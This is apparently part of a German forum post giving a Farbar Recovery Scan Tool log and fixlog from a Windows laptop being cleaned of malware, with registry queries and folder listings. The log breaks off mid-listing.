2017-05-09 18:25 - 2016-10-13 18:22 - 00004342 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-05-09 17:25 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\Macromed

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-12-12 23:28 - 2016-12-12 23:28 - 0001120 _____ () C:\Users\Nick Schuster\AppData\Roaming\.minecraft - Verkn黳fung.lnk
2010-08-28 22:43 - 2010-08-28 22:43 - 0096256 ____N (Google, inc) C:\Users\Nick Schuster\AppData\Roaming\AdbWinApi.dll
2010-08-28 22:43 - 2010-08-28 22:43 - 0060928 ____N (Google, inc) C:\Users\Nick Schuster\AppData\Roaming\AdbWinUsbApi.dll
2017-03-07 15:59 - 2017-03-07 15:59 - 0003330 _____ () C:\Users\Nick Schuster\AppData\Local\recently-used.xbel
2016-01-07 17:00 - 2016-12-17 21:05 - 0007598 _____ () C:\Users\Nick Schuster\AppData\Local\Resmon.ResmonCfg
2017-02-12 14:36 - 2017-04-22 20:22 - 0000552 _____ () C:\Users\Nick Schuster\AppData\Local\TroubleshooterConfig.json
2016-10-21 22:16 - 2016-10-23 18:04 - 0000158 _____ () C:\Users\Nick Schuster\AppData\Local\uts.ini

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix f黵 Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-23 15:34

==================== Ende von FRST.txt ============================
         
--- --- ---

[/CODE]

Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 05-06-2017
durchgef黨rt von Nick Schuster (07-06-2017 10:43:33) Run:2
Gestartet von C:\Users\Nick Schuster\Desktop\anti trojan\killer.exe
Geladene Profile: Nick Schuster (Verf黦bare Profile: Nick Schuster)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************

CloseProcesses:
C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES
2017-05-07 13:16 - 2016-12-17 15:58 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Chromium
Task: {6557BCB6-2F27-448C-ACA4-7E86E4B009E5} - \Update -> Keine Datei <==== ACHTUNG
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Google Updater 2.0"
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
CMD: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"
CMD: reg query "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost"
CMD: dir "%ProgramFiles%"
CMD: dir "%ProgramFiles(x86)%"
CMD: dir "%ProgramData%"
CMD: dir "%Appdata%"
CMD: dir "%LocalAppdata%"
CMD: dir "%CommonProgramFiles(x86)%"
CMD: dir "%CommonProgramW6432%"
CMD: dir "%UserProfile%"
CMD: dir "C:\"
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\Chromium => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6557BCB6-2F27-448C-ACA4-7E86E4B009E5} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6557BCB6-2F27-448C-ACA4-7E86E4B009E5} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Update => Schl黶sel erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Google Updater 2.0 => Wert erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Google Updater 2.0 => Wert nicht gefunden.
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 => Schl黶sel erfolgreich entfernt

========= reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" =========


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
    RPCSS    REG_MULTI_SZ    RpcEptMapper\0RpcSs
    LocalService    REG_MULTI_SZ    nsi\0WdiServiceHost\0w32time\0EventSystem\0WinHttpAutoProxySvc\0SstpSvc\0netprofm\0lltdsvc\0THREADORDER\0FontCache\0fdphost\0bthserv\0WebClient\0workfolderssvc\0RemoteRegistry
    WepHostSvcGroup    REG_MULTI_SZ    WepHostSvc
    defragsvc    REG_MULTI_SZ    defragsvc
    LocalServiceAndNoImpersonation    REG_MULTI_SZ    TimeBroker\0SSDPSRV\0upnphost\0SCardSvr\0BthHFSrv\0QWAVE\0fdrespub\0wcncsvc\0SensrSvc
    DcomLaunch    REG_MULTI_SZ    Power\0LSM\0BrokerInfrastructure\0PlugPlay\0DcomLaunch\0DeviceInstall\0SystemEventsBroker
    LocalSystemNetworkRestricted    REG_MULTI_SZ    WdiSystemHost\0ScDeviceEnum\0WiaRpc\0trkwks\0AudioEndpointBuilder\0WUDFSvc\0hidserv\0dot3svc\0NcbService\0svsvc\0sysmain\0StorSvc\0TabletInputService\0fhsvc\0PcaSvc\0DeviceAssociationService\0homegrouplistener\0wlansvc\0WPDBusEnum\0vmickvpexchange\0vmicshutdown\0vmicvss\0vmicguestinterface\0irmon\0Netman\0UmRdpService
    netsvcs    REG_MULTI_SZ    AeLookupSvc\0CertPropSvc\0SCPolicySvc\0lanmanserver\0gpsvc\0IKEEXT\0iphlpsvc\0seclogon\0AppInfo\0msiscsi\0EapHost\0schedule\0winmgmt\0MMCSS\0browser\0ProfSvc\0SessionEnv\0wercplsupport\0hkmsvc\0BDESVC\0lfsvc\0wlidsvc\0Themes\0DsmSvc\0NcaSvc\0FastUserSwitchingCompatibility\0Ias\0Irmon\0Nla\0Ntmssvc\0NWCWorkstation\0Nwsapagent\0Rasauto\0Rasman\0Remoteaccess\0SENS\0Sharedaccess\0SRService\0Tapisrv\0Wmi\0WmdmPmSp\0wuauserv\0BITS\0ShellHWDetection\0LogonHours\0PCAudit\0helpsvc\0uploadmgr
    WerSvcGroup    REG_MULTI_SZ    wersvc
    WbioSvcGroup    REG_MULTI_SZ    WbioSrvc
    LocalServiceNoNetwork    REG_MULTI_SZ    DPS\0PLA\0BFE\0mpssvc\0NcdAutoSetup\0WwanSvc
    imgsvc    REG_MULTI_SZ    StiSvc
    termsvcs    REG_MULTI_SZ    TermService
    swprv    REG_MULTI_SZ    swprv
    wsappx    REG_MULTI_SZ    WSService\0AppXSvc
    smphost    REG_MULTI_SZ    smphost
    ICService    REG_MULTI_SZ    vmicheartbeat\0vmicrdv
    LocalServiceNetworkRestricted    REG_MULTI_SZ    DHCP\0eventlog\0AudioSrv\0wscsvc\0LmHosts\0AppIDSvc\0wcmsvc\0homegroupprovider\0WPCSvc\0vmictimesync
    LocalServicePeerNet    REG_MULTI_SZ    PNRPSvc\0p2pimsvc\0p2psvc\0PnrpAutoReg
    NetworkServiceAndNoImpersonation    REG_MULTI_SZ    KtmRm
    regsvc    REG_MULTI_SZ    RemoteRegistry
    wcssvc    REG_MULTI_SZ    WcsPlugInService
    NetworkServiceNetworkRestricted    REG_MULTI_SZ    PolicyAgent
    AxInstSVGroup    REG_MULTI_SZ    AxInstSV
    AppReadiness    REG_MULTI_SZ    AppReadiness
    NetworkService    REG_MULTI_SZ    CryptSvc\0nlasvc\0lanmanworkstation\0NapAgent\0WinRM\0WECSVC\0DNSCache\0Tapisrv\0DHCP\0TermService
    print    REG_MULTI_SZ    PrintNotify
    bthaudiosvc    REG_MULTI_SZ    BthHFSrv
    utcsvc    REG_MULTI_SZ    DiagTrack
    zipsvcs    REG_MULTI_SZ    ziphost

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\defragsvc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\ICService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceNetworkRestricted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceNoNetwork
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\NetworkService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\NetworkServiceRemoteDesktopHyperVAgent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\NetworkServiceRemoteDesktopPublishing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\print
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\swprv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\termsvcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\utcsvc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\wcssvc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\WepHostSvcGroup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\wercplsupport
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\wsappx

========= Ende von CMD: =========


========= reg query "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost" =========


HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost
    netsvcs    REG_MULTI_SZ    CertPropSvc\0SCPolicySvc\0lanmanserver\0gpsvc\0iphlpsvc\0msiscsi\0schedule\0winmgmt\0SessionEnv\0FastUserSwitchingCompatibility\0Ias\0Irmon\0Nla\0Ntmssvc\0NWCWorkstation\0Nwsapagent\0Rasauto\0Rasman\0Remoteaccess\0SENS\0Sharedaccess\0SRService\0Tapisrv\0Wmi\0WmdmPmSp\0wuauserv\0BITS\0ShellHWDetection\0LogonHours\0PCAudit\0helpsvc\0uploadmgr
    LocalSystemNetworkRestricted    REG_MULTI_SZ    ScDeviceEnum\0WiaRpc\0AudioEndpointBuilder\0dot3svc\0StorSvc\0Netman\0DeviceAssociationService\0WPDBusEnum\0wlansvc
    LocalService    REG_MULTI_SZ    WinHttpAutoProxySvc\0netprofm\0RemoteRegistry\0WebClient
    imgsvc    REG_MULTI_SZ    StiSvc
    LocalServiceNoNetwork    REG_MULTI_SZ    PLA
    smphost    REG_MULTI_SZ    smphost
    rpcss    REG_MULTI_SZ    RpcSs
    LocalServiceNetworkRestricted    REG_MULTI_SZ    AudioSrv\0wscsvc\0LmHosts\0WPCSvc
    wcssvc    REG_MULTI_SZ    WcsPlugInService
    LocalServiceAndNoImpersonation    REG_MULTI_SZ    SSDPSRV\0upnphost\0SCardSvr\0BthHFSrv\0QWAVE\0wcncsvc
    DcomLaunch    REG_MULTI_SZ    PlugPlay\0DcomLaunch\0DeviceInstall
    NetworkService    REG_MULTI_SZ    CryptSvc\0NapAgent\0WinRM\0WECSVC\0DHCP\0TermService\0DNSCache\0Tapisrv
    zipsvcs    REG_MULTI_SZ    ziphost
    Coedele    REG_MULTI_SZ    Coedele
    LocalServiceir    REG_MULTI_SZ    MCSvc
    MVCService    REG_MULTI_SZ    MVCSrv
    WerrSvcGroup    REG_MULTI_SZ    AppleCloudSvc
    AppleSvcs    REG_MULTI_SZ    AppleAppSvc

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceNetworkRestricted
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceNoNetwork
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\NetworkService
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\NetworkServiceRemoteDesktopHyperVAgent
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\NetworkServiceRemoteDesktopPublishing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\termsvcs
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost\wcssvc

========= Ende von CMD: =========


========= dir "%ProgramFiles%" =========

 Datentr„ger in Laufwerk C: ist NexusLap
 Volumeseriennummer: D6DE-75D0

 Verzeichnis von C:\Program Files

05.06.2017  15:57    <DIR>          .
05.06.2017  15:57    <DIR>          ..
19.03.2017  13:48    <DIR>          Adobe
12.08.2016  19:47    <DIR>          AVAST Software
19.03.2017  16:10    <DIR>          Boris FX, Inc
27.02.2017  11:43    <DIR>          Canon
01.06.2017  21:53    <DIR>          Common Files
25.03.2017  14:29    <DIR>          EqualizerAPO
07.03.2017  15:49    <DIR>          GIMP 2
19.09.2016  17:06    <DIR>          Handbrake
29.05.2017  21:59    <DIR>          Image-Line
26.12.2015  17:46    <DIR>          Intel
14.05.2017  16:17    <DIR>          Internet Explorer
13.02.2017  15:57    <DIR>          Java
05.06.2017  15:57    <DIR>          Malwarebytes
18.03.2017  15:14    <DIR>          MegaDownloader
12.04.2017  11:00    <DIR>          Microsoft Silverlight
07.06.2017  10:35    <DIR>          Mozilla Firefox
27.12.2015  21:26    <DIR>          MSBuild
27.12.2015  21:26    <DIR>          Reference Assemblies
23.10.2016  18:05    <DIR>          SAMSUNG
01.09.2016  17:15    <DIR>          Sony
18.03.2017  14:20    <DIR>          Steinberg
17.09.2016  17:52    <DIR>          VideoLAN
25.02.2017  18:47    <DIR>          Virtual Audio Cable
12.04.2017  10:56    <DIR>          Windows Defender
15.06.2016  11:32    <DIR>          Windows Live
21.11.2014  12:52    <DIR>          Windows Mail
20.02.2017  22:38    <DIR>          Windows Media Player
21.11.2014  12:52    <DIR>          Windows Multimedia Platform
26.12.2015  16:34    <DIR>          Windows NT
21.11.2014  12:52    <DIR>          Windows Photo Viewer
21.11.2014  12:52    <DIR>          Windows Portable Devices
               0 Datei(en),              0 Bytes
              33 Verzeichnis(se), 825.263.292.416 Bytes frei

========= Ende von CMD: =========


========= dir "%ProgramFiles(x86)%" =========

 Datentr„ger in Laufwerk C: ist NexusLap
 Volumeseriennummer: D6DE-75D0

 Verzeichnis von C:\Program Files (x86)

07.06.2017  10:41    <DIR>          .
07.06.2017  10:41    <DIR>          ..
19.03.2017  12:14    <DIR>          Adobe
15.03.2017  17:59    <DIR>          Adobe Photoshop CS6
12.02.2017  14:29    <DIR>          AIMP Classic
18.03.2017  14:21    <DIR>          ASIO4ALL v2
29.01.2017  12:35    <DIR>          Boris FX, Inc
27.02.2017  11:43    <DIR>          Canon
28.05.2017  20:40    <DIR>          Common Files
07.06.2017  10:41    <DIR>          Google
19.03.2017  16:10    <DIR>          Image-Line
26.12.2015  17:46    <DIR>          Intel
14.05.2017  16:17    <DIR>          Internet Explorer
13.02.2017  15:57    <DIR>          Java
23.11.2016  19:16    <DIR>           Malwarebytes Anti-Malware 
12.04.2017  11:00    <DIR>          Microsoft Silverlight
22.08.2013  17:36    <DIR>          Microsoft.NET
29.05.2017  23:08    <DIR>          Minecraft
31.05.2017  10:46    <DIR>          Mozilla Maintenance Service
27.12.2015  21:26    <DIR>          MSBuild
27.02.2017  13:44    <DIR>          OpenOffice 4
05.11.2016  12:01    <DIR>          Reference Assemblies
30.05.2017  14:05    <DIR>          Samsung
22.05.2017  21:24    <DIR>          Skype
01.09.2016  17:15    <DIR>          Sony
26.05.2017  18:19    <DIR>          Steam
18.03.2017  14:20    <DIR>          Steinberg
21.05.2017  19:04    <DIR>          TeamViewer
13.04.2017  12:37    <DIR>          VirtualDJ
05.12.2016  21:46    <DIR>          VstPlugins
12.04.2017  10:56    <DIR>          Windows Defender
15.06.2016  11:32    <DIR>          Windows Live
21.11.2014  12:51    <DIR>          Windows Mail
20.02.2017  22:47    <DIR>          Windows Media Player
21.11.2014  12:51    <DIR>          Windows Multimedia Platform
22.08.2013  17:36    <DIR>          Windows NT
21.11.2014  12:51    <DIR>          Windows Photo Viewer
21.11.2014  12:51    <DIR>          Windows Portable Devices
22.08.2013  17:36    <DIR>          WindowsPowerShell
14.09.2016  14:50    <DIR>          WinRAR
               0 Datei(en),              0 Bytes
              40 Verzeichnis(se), 825.263.235.072 Bytes frei

========= Ende von CMD: =========


========= dir "%ProgramData%" =========

 Datentr„ger in Laufwerk C: ist NexusLap
 Volumeseriennummer: D6DE-75D0

 Verzeichnis von C:\ProgramData

31.07.2016  16:06    <DIR>          360Quarant
19.03.2017  13:39    <DIR>          Adobe
31.05.2017  13:52    <DIR>          Apple
03.05.2017  17:34    <DIR>          Apple Computer
27.02.2017  11:18    <DIR>          AudioUTOPiA
12.08.2016  14:05    <DIR>          AVAST Software
04.11.2016  23:17    <DIR>          Avg
05.11.2016  12:01    <DIR>          Avira
13.10.2016  22:01    <DIR>          Big Fish
29.04.2017  13:08    <DIR>          BlueStacksSetup
13.10.2016  22:04    <DIR>          BOONTY
19.03.2017  11:25    <DIR>          boost_interprocess
27.02.2017  11:37    <DIR>          Canon
27.02.2017  11:41    <DIR>          Canon IJ Network Tool
24.05.2017  11:40    <DIR>          CanonIJPLM
27.02.2017  11:42    <DIR>          CanonIJWSpt
14.02.2017  17:04    <DIR>          CyberLink
07.05.2017  13:13    <DIR>          DAEMON Tools Lite
25.05.2017  15:33    <DIR>          DAEMON Tools Pro
20.02.2017  22:29    <DIR>          DFX
27.12.2016  21:44    <DIR>          Dropbox
26.05.2017  18:05    <DIR>          Electronic Arts
05.11.2016  00:04    <DIR>          Freemake
29.01.2017  12:35    <DIR>          FXHOME
11.06.2016  17:57    <DIR>          GFACE
31.07.2016  16:06    <DIR>          GlassWire
25.05.2017  15:49    <DIR>          install_backup
14.02.2017  16:53    <DIR>          install_clap
03.02.2017  22:04    <DIR>          Intel
13.10.2016  17:17    <DIR>          Intenium
01.08.2016  23:17    <DIR>          MAGIX
05.06.2017  15:57    <DIR>          Malwarebytes
15.06.2016  11:31    <DIR>          Microsoft OneDrive
03.12.2016  19:50    <DIR>          Microsoft Toolkit
12.11.2016  11:00    <DIR>          Oracle
25.05.2017  16:04    <DIR>          Orbit
27.02.2017  11:17    <DIR>          PACE
22.05.2017  21:24    <DIR>          Package Cache
05.11.2016  22:36    <DIR>          Razer
22.10.2016  14:20    <DIR>          Red Giant
24.09.2016  19:08    <DIR>          RedGiant
19.03.2017  13:44    <DIR>          regid.1986-12.com.adobe
21.11.2014  12:51    <DIR>          regid.1991-06.com.microsoft
30.05.2017  14:05    <DIR>          Samsung
22.05.2017  21:24    <DIR>          Skype
25.05.2017  15:49    <DIR>          SUPPORTDIR
25.05.2017  15:49    <DIR>          TEMP
01.09.2016  17:10    <DIR>          UniqueId
02.09.2016  17:41    <DIR>          WinZip
               0 Datei(en),              0 Bytes
              49 Verzeichnis(se), 825.263.173.632 Bytes frei

========= Ende von CMD: =========


========= dir "%Appdata%" =========

 Datentr„ger in Laufwerk C: ist NexusLap
 Volumeseriennummer: D6DE-75D0

 Verzeichnis von C:\Users\Nick Schuster\AppData\Roaming

07.06.2017  10:43    <DIR>          .
07.06.2017  10:43    <DIR>          ..
29.05.2017  23:08    <DIR>          .minecraft
12.12.2016  23:28             1.120 .minecraft - Verkn乸fung.lnk
28.08.2010  22:43            96.256 AdbWinApi.dll
28.08.2010  22:43            60.928 AdbWinUsbApi.dll
21.03.2017  21:33    <DIR>          Adobe
29.03.2017  10:54    <DIR>          Antares
04.05.2017  00:15    <DIR>          Apple Computer
19.03.2017  16:58    <DIR>          audacity
13.02.2017  17:40    <DIR>          avidemux
31.07.2016  17:09    <DIR>          Brotsoft
06.03.2017  17:50    <DIR>          Canon
07.05.2017  13:53    <DIR>          DAEMON Tools Lite
25.05.2017  15:36    <DIR>          DAEMON Tools Pro
14.09.2016  23:35    <DIR>          Design-Lib.Com
26.12.2015  22:50    <DIR>          dlg
27.12.2016  21:44    <DIR>          Dropbox
14.04.2017  19:23    <DIR>          dvdcss
19.09.2016  23:58    <DIR>          DVDVideoSoft
07.06.2017  10:34    <DIR>          Google
18.04.2017  20:03    <DIR>          HandBrake
19.09.2016  17:08    <DIR>          HandBrake Team
12.10.2016  16:07    <DIR>          Image-Line
16.01.2016  14:24    <DIR>          Intenium
12.10.2016  16:10    <DIR>          IrfanView
26.12.2015  23:06    <DIR>          java
04.11.2016  23:43    <DIR>          Kingosoft
17.12.2016  14:29    <DIR>          LOVE
26.12.2015  16:48    <DIR>          Macromedia
01.09.2016  13:55    <DIR>          MAXON
20.02.2017  22:17    <DIR>          Mozilla
01.12.2016  16:37    <DIR>          Music Editor Free
22.12.2016  15:14    <DIR>          Music Recognition
01.12.2016  16:31    <DIR>          New Version Available
27.02.2017  13:39    <DIR>          OpenOffice
14.06.2016  21:01    <DIR>          Publish Providers
24.09.2016  19:16    <DIR>          Red Giant
03.05.2017  17:47    <DIR>          redsn0w
30.05.2017  14:05    <DIR>          Samsung
28.04.2017  17:03    <DIR>          SecondLife
22.05.2017  21:46    <DIR>          Skype
26.12.2015  23:29    <DIR>          skyz
17.12.2016  14:29    <DIR>          SmartSteamEmu
02.09.2016  17:44    <DIR>          Sony
17.09.2016  18:44    <DIR>          Sony Creative Software Inc
26.12.2015  23:04    <DIR>          Sun
22.12.2016  16:03    <DIR>          Synthesia
17.05.2017  18:44    <DIR>          TeamViewer
03.09.2016  19:59    <DIR>          TechSmith
04.06.2017  10:17    <DIR>          vlc
03.06.2017  18:29    <DIR>          Wargaming.net
03.01.2017  13:21    <DIR>          windows
05.05.2017  18:00    <DIR>          WinRAR
               3 Datei(en),        158.304 Bytes
              51 Verzeichnis(se), 825.263.116.288 Bytes frei

========= Ende von CMD: =========


========= dir "%LocalAppdata%" =========

 Datentr„ger in Laufwerk C: ist NexusLap
 Volumeseriennummer: D6DE-75D0

 Verzeichnis von C:\Users\Nick Schuster\AppData\Local

07.06.2017  10:43    <DIR>          .
07.06.2017  10:43    <DIR>          ..
08.01.2016  15:51    <DIR>          activision
01.04.2017  15:47    <DIR>          Adobe
05.11.2016  17:24    <DIR>          Android
17.09.2016  17:56    <DIR>          Apple
04.05.2017  00:15    <DIR>          Apple Computer
31.07.2016  15:01    <DIR>          Apps
04.11.2016  23:16    <DIR>          Atajerge
02.07.2016  19:50    <DIR>          Audacity
13.10.2016  22:01    <DIR>          Big Fish
31.05.2017  17:34    <DIR>          Bluestacks
27.12.2015  20:13    <DIR>          CEF
07.06.2017  10:38    <DIR>          CrashDumps
29.01.2017  12:37    <DIR>          Crashpad
22.01.2017  18:05    <DIR>          CrashReportClient
09.06.2016  17:23    <DIR>          CrashRpt
14.02.2017  17:00    <DIR>          Cyberlink
07.06.2017  10:41    <DIR>          Deployment
20.02.2017  22:29    <DIR>          DFX
19.03.2017  16:06    <DIR>          Diagnostics
07.05.2017  14:03    <DIR>          Disc_Soft_Ltd
27.12.2016  21:45    <DIR>          Dropbox
17.11.2016  20:53    <DIR>          ElevatedDiagnostics
07.03.2017  15:40    <DIR>          fontconfig
28.02.2017  19:30    <DIR>          FreeOCR
29.01.2017  12:37    <DIR>          FXHOME
29.01.2017  12:37    <DIR>          FXHOME Helper
07.03.2017  15:40    <DIR>          gegl-0.2
31.07.2016  16:07    <DIR>          GlassWire
07.06.2017  10:41    <DIR>          Google
07.03.2017  15:59    <DIR>          gtk-2.0
29.12.2015  02:25    <DIR>          GWX
26.12.2015  23:07    <DIR>          Intel_Corporation
12.02.2017  14:37    <DIR>          Macromedia
17.03.2017  15:51    <DIR>          Mega Limited
18.03.2017  15:22    <DIR>          MegaDownloader
31.05.2017  12:02    <DIR>          Microsoft
13.10.2016  18:21    <DIR>          Mozilla
18.10.2016  15:29    <DIR>          MSfree Inc
10.05.2017  16:11    <DIR>          My Games
25.11.2016  22:11    <DIR>          NBTExplorer
08.10.2016  19:52    <DIR>          Oblivion
27.02.2017  11:43    <DIR>          Packages
07.06.2017  10:34    <DIR>          Pleperiedsdeied
13.10.2016  18:15    <DIR>          Profiles
02.01.2016  17:48    <DIR>          Programs
07.05.2017  15:12    <DIR>          PunkBuster
05.11.2016  22:36    <DIR>          Razer
07.03.2017  15:59             3.330 recently-used.xbel
17.12.2016  21:05             7.598 Resmon.ResmonCfg
05.11.2016  22:35    <DIR>          RzStats
03.02.2017  12:28    <DIR>          Samsung
31.05.2017  17:31    <DIR>          Sony
17.12.2016  15:58    <DIR>          Steam
07.06.2017  10:34    <DIR>          Sternetain
02.09.2016  18:42    <DIR>          TechSmith
07.06.2017  10:43    <DIR>          Temp
22.04.2017  20:22               552 TroubleshooterConfig.json
03.06.2016  19:21    <DIR>          Ubisoft
11.05.2017  23:41    <DIR>          Ubisoft Game Launcher
18.11.2016  18:26    <DIR>          Unity
22.01.2017  18:46    <DIR>          UnrealEngine
21.10.2016  22:16    <DIR>          uts
23.10.2016  18:04               158 uts.ini
03.01.2017  02:54    <DIR>          VirtualStore
27.02.2017  12:05    <DIR>          Windows Live
               4 Datei(en),         11.638 Bytes
              63 Verzeichnis(se), 825.263.058.944 Bytes frei

========= Ende von CMD: =========


========= dir "%CommonProgramFiles(x86)%" =========

 Datentr„ger in Laufwerk C: ist NexusLap
 Volumeseriennummer: D6DE-75D0

 Verzeichnis von C:\Program Files (x86)\Common Files

28.05.2017  20:40    <DIR>          .
28.05.2017  20:40    <DIR>          ..
05.06.2017  15:53    <DIR>          Adobe
14.09.2016  17:05    <DIR>          Adobe AIR
12.08.2016  13:34    <DIR>          AV
13.10.2016  22:04    <DIR>          BOONTY Shared
24.09.2016  19:16    <DIR>          Intel
13.02.2017  15:57    <DIR>          Java
01.08.2016  23:17    <DIR>          MAGIX Services
01.08.2016  23:05    <DIR>          MAGIX Shared
28.06.2016  16:43    <DIR>          Microsoft Shared
25.05.2017  15:48    <DIR>          Nikon
12.10.2016  16:07    <DIR>          Propellerhead Software
24.07.2016  13:07    <DIR>          PX Storage Engine
23.11.2016  19:16    <DIR>          Services
22.05.2017  21:24    <DIR>          Skype
01.05.2017  22:36    <DIR>          Steam
21.11.2014  12:51    <DIR>          System
26.02.2017  18:57    <DIR>          vst3
15.06.2016  11:30    <DIR>          Windows Live
               0 Datei(en),              0 Bytes
              20 Verzeichnis(se), 825.263.001.600 Bytes frei

========= Ende von CMD: =========


========= dir "%CommonProgramW6432%" =========

 Datentr„ger in Laufwerk C: ist NexusLap
 Volumeseriennummer: D6DE-75D0

 Verzeichnis von C:\Program Files\Common Files

01.06.2017  21:53    <DIR>          .
01.06.2017  21:53    <DIR>          ..
19.03.2017  13:49    <DIR>          Adobe
22.12.2016  16:58    <DIR>          logishrd
15.06.2016  11:32    <DIR>          microsoft shared
21.11.2014  12:52    <DIR>          System
05.12.2016  21:46    <DIR>          VST2
27.02.2017  11:18    <DIR>          vst3
               0 Datei(en),              0 Bytes
               8 Verzeichnis(se), 825.262.944.256 Bytes frei

========= Ende von CMD: =========


========= dir "%UserProfile%" =========

 Datentr„ger in Laufwerk C: ist NexusLap
 Volumeseriennummer: D6DE-75D0

 Verzeichnis von C:\Users\Nick Schuster

05.06.2017  15:41    <DIR>          .
